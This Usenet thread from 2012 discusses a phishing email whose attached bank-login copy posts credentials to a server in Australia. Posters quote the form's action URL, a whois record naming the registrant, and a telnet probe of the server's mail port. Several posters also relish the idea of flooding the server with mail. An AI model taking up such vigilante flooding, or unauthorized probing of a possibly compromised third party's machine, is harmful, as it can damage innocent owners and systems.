I got a phishing email today.

Told me to click on the HTML and sort out my bank.

A bit of inspection of teh attached code showed that it wanted me using
a direct copy of my banks login page, to submit my details to a machine
in Australia. Registered address was a Richard someone or other.

Armed with the IP address of said spammers machine, I managed to
ascertain it was running a mail system. Better still,. it accepted mail
to 'root@localhost' (most machines will).

He has mail..

I do have under development on a centrally located server with
gigabytes of bandwidth a mail client that will send mail to any IP
address directly..the thought of flooding his mailbox with 1000 mails a
second appeals..

OTOH I may just register the IP address with spamhaus

:-(

On Feb 23, 2:00 pm, The Natural Philosopher
wrote:
I got a phishing email today.

Told me to click on the HTML and sort out my bank.

A bit of inspection of teh attached code showed that it wanted me using
a direct copy of my banks login page, to submit my details to a machine
in Australia. Registered address was a Richard someone or other.

Armed with the IP address of said spammers machine, I managed to
ascertain it was running a mail system. Better still,. it accepted mail
to 'root@localhost' (most machines will).

He has mail..

I do have under development on a centrally located server with
gigabytes of bandwidth a mail client that will send mail to any IP
address directly..the thought of flooding his mailbox with 1000 mails a
second appeals..

OTOH I may just register the IP address with spamhaus

:-(

was poor Richard directly responsible or had his domain been hacked by
miscreants?

Jim K

On Feb 23, 2:13*pm, Jim K wrote:


was poor Richard directly responsible or had his domain been hacked by
miscreants?

Jim K

If "poor Richard" has been hacked receipt of 1000 mails a second might
make him more careful with his system security in future.

On Feb 23, 3:01*pm, 82045 wrote:
On Feb 23, 2:13*pm, Jim K wrote:



was poor Richard directly responsible or had his domain been hacked by
miscreants?

Jim K

If "poor Richard" has been hacked receipt of 1000 mails a second might
make him more careful with his system security in future.

More likely poor Richard doesnt have a clue what's going on, and will
simply have to abandon the email addy altogether.


NT

NT wrote:
On Feb 23, 3:01 pm, 82045 wrote:
On Feb 23, 2:13 pm, Jim K wrote:



was poor Richard directly responsible or had his domain been hacked by
miscreants?
Jim K
If "poor Richard" has been hacked receipt of 1000 mails a second might
make him more careful with his system security in future.

More likely poor Richard doesnt have a clue what's going on, and will
simply have to abandon the email addy altogether.



Dear boy it was not an 'email addy' it was a physical linux machine.
And it was where, if I had been stupid enough to fall for the scam, the
supplied form would have sent my bank account details and password.

Now Richard may be entirely innocent, but if he is his machine is
running a lot of code he doesn't know about including a whole webserver
and set of PHP scripts.






NT

On 23/02/2012 15:53, NT wrote:
More likely poor Richard doesnt have a clue what's going on, and will
simply have to abandon the email addy altogether.

You may call him Richard, we'll just call him Dick.

Andy

On Feb 23, 8:46 pm, Andy Champ wrote:
On 23/02/2012 15:53, NT wrote:

More likely poor Richard doesnt have a clue what's going on, and will
simply have to abandon the email addy altogether.

You may call him Richard, we'll just call him Dick.

Andy

or Dick Unwittington perchance?

Jim K

Tim Streater wrote:
In article
,
NT wrote:

On Feb 23, 3:01 pm, 82045 wrote:
On Feb 23, 2:13 pm, Jim K wrote:

was poor Richard directly responsible or had his domain been
hacked by
miscreants?

If "poor Richard" has been hacked receipt of 1000 mails a second might
make him more careful with his system security in future.

More likely poor Richard doesnt have a clue what's going on, and will
simply have to abandon the email addy altogether.

The OP said that Richard was running a mail server.

He was running a web server to gather phished data.

In which case if he
set that up, he should know better. If he didn't, and he's just a bot,
then 1000 mails a second should fill his disk up PDQ and the machine
will fall over.


Look it seems that people don't actually understand this scam.

A letter arrives. It appears to come from - lets say -


One giveaway is it isn't addressed directly to you, by name.

It tells you to click on the attached html form and fill it out.

This form takes 99% of your own banks website, but with one crucial
difference, Instead of submitting the form to your bank, it submits it
to the phishing web server.. I didn't try doing that to see what would
happen.

eg in it is this line

form name="form1"
action="http://www.drabcdfirstaid.com.au/.images/a.php" method="post"

At that point whatever you keyed in is now available to the phisher.

Anyway, I identified that server, and discovered it would accept emails.

#whois drabcdfirstaid.com.au
Domain Name: drabcdfirstaid.com.au
Last Modified: 30-Aug-2011 10:55:39 UTC
Registrar ID: NetRegistry
Registrar Name: NetRegistry
Status: ok

Registrant: LLOYD, RICHARD MILES
Eligibility Type: Sole Trader
Eligibility ID: ABN 35521483210
......

so

#telnet www.drabcdfirstaid.com.au 25
Trying 64.251.30.196...
Connected to drabcdfirstaid.com.au.
Escape character is '^]'.
220 spxxxx.int.infolink.com ESMTP Postfix (Ubuntu)

tells me its a ubuntu machine running postfix mail. Now I know that if I
carry on with this telnet into the SMTP port, its very likely that
root@localhost will be accepted as a direct recipient into the root
users mailbox.

So I sent one. And it was.

The email came via an oregon ISP. From a completely different source
entirely.

Now its possible looking at the above that poor old richard doesn't know
he has a nasty file stuffed in a hidden directory (.image) on his web
server.

OTOH I did not do anything nasty. He knows he's been violated at one
level or another so if he doesn't get down and check his server out, and
see lots of unusual access, he's a first grade dope anyway.

The Natural Philosopher :
Tim Streater wrote:
In article
oups.com,
NT wrote:

On Feb 23, 3:01 pm, 82045 wrote:
On Feb 23, 2:13 pm, Jim K wrote:

was poor Richard directly responsible or had his domain been
hacked by
miscreants?

If "poor Richard" has been hacked receipt of 1000 mails a second
might
make him more careful with his system security in future.

More likely poor Richard doesnt have a clue what's going on, and will
simply have to abandon the email addy altogether.
The OP said that Richard was running a mail server.

He was running a web server to gather phished data.

In which case if he
set that up, he should know better. If he didn't, and he's just a
bot, then 1000 mails a second should fill his disk up PDQ and the
machine will fall over.


Look it seems that people don't actually understand this scam.

A letter arrives. It appears to come from - lets say - customer-


One giveaway is it isn't addressed directly to you, by name.

It tells you to click on the attached html form and fill it out.

Do I understand you correctly, that some e-mail clients will accept an
HTML form and enable you to complete and submit it without it being
displayed in your browser? That sounds scary. I ask because my mail
client won't do anything like that, I'm sure.

--
Mike Barnes

"The Natural Philosopher" wrote in message
...
snip

so

#telnet www.drabcdfirstaid.com.au 25
Trying 64.251.30.196...
Connected to drabcdfirstaid.com.au.
Escape character is '^]'.
220 spxxxx.int.infolink.com ESMTP Postfix (Ubuntu)

tells me its a ubuntu machine running postfix mail. Now I know that if I
carry on with this telnet into the SMTP port, its very likely that
root@localhost will be accepted as a direct recipient into the root users
mailbox.

So I sent one. And it was.
snip

This tells me that you aren't in the habit of typing in SMTP at the
keyboard, or you could have confirmed the acceptance of the 'root@localhost'
address whilst connected to the server via Telnet.
Then again, I'd have to refresh my memory of the RFCs before attempting it
now :-)

Ah - rereading it may well be that you did as I suggested instead of sending
a seperate email.

For those wondering if it was a mail address, a web server, whatever, a
standard server install of Ubuntu can give you the whole nine yards in one
go.
Posibly the person who set up the system was focussed on installing the web
server and hadn't realised he/she/it had also set up a working mail server
by default.
Then again all the incoming mail may be redirected to '/dev/null'.

Cheers

Dave R

--
No plan survives contact with the enemy.
[Not even bunny]

Helmuth von Moltke the Elder

(\__/)
(='.'=)
(")_(")

82045 wrote:
On Feb 23, 2:13 pm, Jim K wrote:

was poor Richard directly responsible or had his domain been hacked by
miscreants?

Jim K

If "poor Richard" has been hacked receipt of 1000 mails a second might
make him more careful with his system security in future.

Precisely do.

Jim K wrote:
On Feb 23, 2:00 pm, The Natural Philosopher
wrote:
I got a phishing email today.

Told me to click on the HTML and sort out my bank.

A bit of inspection of teh attached code showed that it wanted me using
a direct copy of my banks login page, to submit my details to a machine
in Australia. Registered address was a Richard someone or other.

Armed with the IP address of said spammers machine, I managed to
ascertain it was running a mail system. Better still,. it accepted mail
to 'root@localhost' (most machines will).

He has mail..

I do have under development on a centrally located server with
gigabytes of bandwidth a mail client that will send mail to any IP
address directly..the thought of flooding his mailbox with 1000 mails a
second appeals..

OTOH I may just register the IP address with spamhaus

:-(

was poor Richard directly responsible or had his domain been hacked by
miscreants?


well that's up to him to sort out.

But the machine looked pretty tight to me.



Jim K